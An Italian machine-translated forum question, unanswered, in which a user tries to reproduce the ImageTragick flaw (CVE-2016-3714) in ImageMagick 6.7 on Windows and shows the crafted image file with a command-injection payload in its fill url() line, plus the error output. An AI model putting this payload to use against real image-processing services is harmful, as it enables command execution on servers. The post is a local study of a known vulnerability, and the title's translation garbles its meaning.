Perché la versione 6.7 di image magick può essere sfruttata anche se è una versione vulnerabile?

0

Ho installato una versione vulnerabile dell'immagine magick i.e. 6.7 e in base a questo CVE-2016-3714 è una versione vulnerabile. Ora, perché l'ho scaricato perché ho un'idea chiara di questa vulnerabilità.

Problema.

Di seguito è riportato il mio codice file per test.png

push graphic-context

viewbox 0 0 640 480

fill 'url(https://127.0.0.1/oops.jpg" && mkdir" /hacked )'

pop graphic-context

poiché sono un utente di Windows 10.

Ora, quando lo eseguo attraverso il terminale come questo convert test.png test2.jpg ciò che ho visto nell'errore è

convert.exe: unrecognized color 'https://127.0.0.1/oops.jpg" && mkdir" /hacked ' @ warning/color.c/GetColorCompliance/947.
convert.exe: no decode delegate for this image format '//127.0.0.1/oops.jpg" && mkdir" /hacked ' @ error/constitute.c/ReadImage/532.
convert.exe: Non-conforming drawing primitive definition 'fill' @ error/draw.c/DrawImage/3146.

Ora non ho alcuna idea sul problema, tutto quello che so è che ho sicuramente una versione vulnerabile ma non posso sfruttarla.

Apprezzerà qualsiasi risposta.

Grazie

    
posta Utkarsh Agrawal 02.08.2018 - 05:53
fonte

0 risposte

Leggi altre domande sui tag